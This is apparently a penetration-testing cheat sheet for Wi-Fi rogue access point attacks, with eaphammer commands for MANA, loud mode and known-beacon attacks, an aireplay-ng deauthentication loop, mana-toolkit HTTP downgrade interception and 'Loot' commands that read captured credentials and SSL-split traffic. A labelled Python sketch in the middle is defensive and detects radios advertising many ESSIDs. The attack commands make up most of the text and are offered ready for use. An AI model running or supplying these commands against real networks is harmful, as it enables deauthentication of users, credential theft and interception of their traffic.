MANA and known beacons

WIPS bypass

Create white list

echo <BSSID> > bssid_targets.txt

Create rogue AP

./eaphammer -i <wlan0> -e <ESSID> --pmf enable --cloaking full --mana --auth <wpa-eap | wpa-psk> --creds --mac-whitelist bssid_targets.txt

As the rogue AP is waiting for probe requests, deauthenticate supplicants

for i in $(cat bssid_targets.txt); do aireplay-ng -0 5 -a <ap_mac> -c "$i" <mon_iface>; done

MANA loud mode

./eaphammer -i <wlan0> -e <ESSID> --cloaking full --mana --loud

Known beacon attack

./eaphammer -i <wlan0> --mana -e <known_ESSID> --known-beacons --captive-portal --known-ssids-file <list_of_known_ESSID.txt> [--loud]
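
Detection side (added example, not part of the original cheat sheet or of eaphammer): known beacons and MANA loud mode both make one radio advertise or answer for many ESSIDs, while legitimate multi-SSID APs normally use a separate BSSID per ESSID. The sketch below flags any BSSID seen with several distinct ESSIDs in a short window; the frame tuples, window and threshold are constructed assumptions.

```python
from collections import defaultdict

# Constructed sample: (epoch seconds, frame subtype, transmitter BSSID, ESSID).
# In practice these fields would come from a monitor-mode capture export.
FRAMES = [
    (100.0, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi"),
    (100.1, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi"),
    (100.2, "beacon", "02:11:22:33:44:55", "CorpWiFi"),
    (100.3, "beacon", "02:11:22:33:44:55", "HomeNet"),
    (100.4, "beacon", "02:11:22:33:44:55", "CoffeeShop"),
    (100.5, "beacon", "02:11:22:33:44:55", "Airport_Free"),
    (101.0, "probe-resp", "02:de:ad:be:ef:01", "HomeNet"),
    (101.2, "probe-resp", "02:de:ad:be:ef:01", "Hotel-Guest"),
    (101.4, "probe-resp", "02:de:ad:be:ef:01", "CorpWiFi"),
    (101.6, "probe-resp", "02:de:ad:be:ef:01", ""),   # empty SSID element, ignored
    (500.0, "beacon", "aa:bb:cc:00:00:02", "Guest"),
    (900.0, "beacon", "aa:bb:cc:00:00:02", "Guest-IoT"),  # same BSSID, far apart
]

def multi_essid_transmitters(frames, window=10.0, threshold=3):
    """Return {bssid: (subtype, sorted ESSIDs)} for radios that advertise at
    least `threshold` distinct ESSIDs inside any `window`-second span."""
    seen = defaultdict(list)              # (bssid, subtype) -> [(ts, essid)]
    for ts, subtype, bssid, essid in frames:
        if essid:                         # skip hidden/empty SSID elements
            seen[(bssid.lower(), subtype)].append((ts, essid))
    alerts = {}
    for (bssid, subtype), events in seen.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until the span fits.
            while events[end][0] - events[start][0] > window:
                start += 1
            essids = {e for _, e in events[start:end + 1]}
            if len(essids) >= threshold:
                alerts[bssid] = (subtype, sorted(essids))
                break                     # first hit per radio is enough
    return alerts

if __name__ == "__main__":
    for bssid, (subtype, essids) in multi_essid_transmitters(FRAMES).items():
        print(f"{bssid} sent {subtype} frames for {len(essids)} ESSIDs: {essids}")
```

Beacon hits point at known-beacon behaviour, probe-response hits at MANA-style answering; tune the threshold to the site's real AP inventory.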

Mana-toolkit (deprecated) - HTTP downgrade attacks

Start Mana - Custom script

/usr/share/mana-toolkit/run-mana/custom.sh

Loot

cat /var/lib/mana-toolkit/net-creds*
cat /var/lib/mana-toolkit/sslsplit-connect*
cat /var/lib/mana-toolkit/sslstrip.log*
strings /var/lib/mana-toolkit/sslsplit/* | grep -i <keyword>
cp -r /var/lib/mana-toolkit/sslsplit/ /tmp
bulk_extractor -R /tmp/sslsplit/ -o /tmp/loot
binwalk /tmp/sslsplit/* -e